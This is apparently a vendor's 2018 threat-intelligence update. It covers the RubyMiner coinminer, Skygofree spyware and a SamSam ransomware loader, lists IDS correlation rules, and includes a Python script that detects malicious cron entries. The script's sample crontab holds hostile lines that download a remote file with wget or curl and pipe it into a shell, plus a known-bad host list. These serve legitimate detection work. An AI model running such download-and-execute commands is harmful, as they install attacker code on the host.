Threat Intelligence and Cyber Threat Management (CTM) Protection Update for the 3rd week of January 2018

New Detection Technique – RubyMiner

RubyMiner is a new version of a Monero coinminer family, written in Ruby, that exploits a known remote code execution vulnerability in Ruby on Rails (CVE-2013-0156). The attacker sends a base64-encoded payload inside an HTTP POST request header. Servers that never applied the patch for this vulnerability (public since 2013) are potentially vulnerable to RubyMiner.

The payload contains a script that adds a new entry to the crontab of the host. The job runs once per hour and downloads a file named robots.txt via wget. That file is actually a shell script which checks whether a coinminer is already running and, if not, downloads the miner from internetsearch[.]is/sshd and executes it.
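The persistence step above leaves a recognisable trace on the host: an hourly cron entry that fetches a file called robots.txt with wget or curl and hands it to a shell. The following script is an added example, not code from the original update or from the RubyMiner campaign; it parses user-crontab text and flags entries matching that pattern. The sample crontab is constructed for illustration (the placement of robots.txt on internetsearch[.]is and the 203.0.113.7 host are assumptions, not observed indicators), and only the internetsearch[.]is domain comes from the report.

```python
import shlex

# Constructed sample crontab modelled on the chain described above:
# an hourly job that wgets robots.txt and pipes it into a shell.
# Hosts and paths are illustrative, not captured indicators.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
1 * * * * wget -q -O - http://internetsearch[.]is/robots.txt | bash -sh
*/15 * * * * /opt/backup/run.sh
0 * * * * curl -s http://203.0.113.7/robots.txt -o /tmp/r.txt && sh /tmp/r.txt
"""

FETCHERS = {"wget", "curl"}
SHELLS = {"sh", "bash", "dash", "zsh"}
# Domain named in the report; the defanged and plain forms are both matched.
KNOWN_BAD_HOSTS = {"internetsearch[.]is", "internetsearch.is"}


def is_hourly(minute, hour):
    """True when the schedule fires once per hour: fixed minute, any hour."""
    return minute.isdigit() and hour == "*"


def inspect_cron_line(line):
    """Return a list of findings for one user-crontab line (5 schedule
    fields plus command). Comments, blanks and benign jobs yield []."""
    stripped = line.strip()
    if not stripped or stripped.startswith("#"):
        return []
    fields = stripped.split(None, 5)
    if len(fields) < 6:
        return []
    minute, hour, _dom, _mon, _dow, command = fields

    try:
        tokens = shlex.split(command)
    except ValueError:          # unbalanced quotes; fall back to a crude split
        tokens = command.split()
    # Reduce /usr/bin/wget to wget so path prefixes do not hide the binary.
    names = {token.rsplit("/", 1)[-1] for token in tokens}

    uses_fetcher = bool(names & FETCHERS)
    fetches_robots = "robots.txt" in command
    feeds_shell = bool(names & SHELLS)

    findings = []
    if uses_fetcher and fetches_robots and feeds_shell:
        findings.append("downloads robots.txt and runs it as a shell script")
        if is_hourly(minute, hour):
            findings.append("runs once per hour")
    bad_hosts = sorted(host for host in KNOWN_BAD_HOSTS if host in command)
    if bad_hosts:
        findings.append("contacts known RubyMiner host: " + ", ".join(bad_hosts))
    return findings


def scan_crontab(text):
    """Scan crontab text and return suspicious entries with their findings."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        findings = inspect_cron_line(line)
        if findings:
            hits.append({"line": number, "entry": line.strip(), "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {hit['line']}: {hit['entry']}")
        for finding in hit["findings"]:
            print(f"    - {finding}")
```

Run it against `crontab -l` output for each user (and, with the extra user field stripped, against /etc/crontab and /etc/cron.d); the domain match is only a secondary signal, since the miner download host can change while the download-and-execute pattern stays the same.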

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, RubyMiner

New Detection Technique – Skygofree

Skygofree is Android spyware discovered in the wild in 2017 and based on initial versions dating from 2014. The malware can collect and exfiltrate a large amount of data, such as call records, text messages, geolocation, calendar events, surrounding audio and other data held in memory. It can also steal WhatsApp messages via Accessibility Services and connect the device to Wi-Fi networks controlled by the attackers.

The malware is delivered inside malicious apps downloaded from third-party sources. Attackers can control the implant via HTTP, XMPP, SMS and Firebase Cloud Messaging. The latest version supports 48 different C&C commands, which can perform actions such as killing idle services to guarantee resource availability, creating a rogue Wi-Fi connection with a specific configuration, and controlling the camera.

We've added IDS signatures and the following correlation rule to detect this activity:

  • System Compromise, Trojan infection, Skygofree

New Detection Techniques – Trojan Infection

We've updated the following correlation rules as a result of additional recent malicious activity:

  • System Compromise, Trojan infection, Andariel Andarat
  • System Compromise, Trojan infection, CrimeScene
  • System Compromise, Trojan infection, Emrethob
  • System Compromise, Trojan infection, Plumb3rMiner
  • System Compromise, Trojan infection, QwertMiner
  • System Compromise, Trojan infection, SamMiner
  • System Compromise, Trojan infection, Sathurbot.AN
  • System Compromise, Trojan infection, Sverki
  • System Compromise, Trojan infection, VBS.ARS
  • System Compromise, Trojan infection, Win32.Drun
  • System Compromise, Trojan infection, XanaduMiner

New Detection Techniques

We've added the following correlation rules as a result of additional recent malicious activity:

  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, BlackTDS Malicious Activity
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, MODX Revolution 2.5.6 Blind SQL Injection
  • Exploitation & Installation, Configuration Changed, Generic ADSL Router DNS Change Request
  • Exploitation & Installation, Suspicious Behaviour, Possible Belkin N600DB Wireless Router Request Forgery Attempt

Updated Detection Technique – SamSam

A new variant of SamSam ransomware was discovered in the wild in the first weeks of 2018. The new variant is deployed using a loader which decrypts and executes an encrypted ransomware payload, an improvement in the anti-forensic methods used by the malware. It is believed that, as with previous variants, the attacker must access the compromised machine manually in order to deliver and execute the malware components.

The file encryption mechanism of this SamSam variant is unchanged from older versions: a symmetric key is randomly generated for each file. However, string obfuscation (the strings are encrypted with AES) and anti-analysis techniques have been added. During execution, the loader looks in its own directory for files with the extension .stubbin, which contain the encrypted SamSam .NET assembly payload and must be placed there manually by the attacker. The loader then decrypts the payload with a password supplied as its first command-line argument and executes it, so the ransomware itself never has to be written to disk in plaintext.

The attackers have received more than 30.5 BTC so far.

We've added IDS signatures and updated the following correlation rule to detect this activity:

  • System Compromise, Ransomware infection, SamSam

Updated Correlation Rules

We've updated the following correlation rules as a result of recent malicious activity:

  • Delivery & Attack, Malicious website, Phishing activity
  • Exploitation & Installation, Client Side Exploit - Known Vulnerability, HTA File containing Wscript.Shell Call
  • Reconnaissance & Probing, Configuration Changed, Master IP CAM 01 Unauthenticated Configuration Change (CVE-2018-5725)
  • System Compromise, C&C Communication, Meterpreter SSL Certificate
  • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
  • System Compromise, Malware infection, CoinMiner
  • System Compromise, Malware infection, Suspicious connections to a Dynamic DNS domain
  • System Compromise, Malware RAT, Remcos/Remvio
  • System Compromise, Trojan infection, AgentTesla
  • System Compromise, Trojan infection, Banker
  • System Compromise, Trojan infection, dnsd
  • System Compromise, Trojan infection, Generic PowerShell
  • System Compromise, Trojan infection, Kryptik
  • System Compromise, Trojan infection, Rodecap
  • System Compromise, Trojan infection, Unknown trojan
  • System Compromise, Trojan infection, Windows Mirai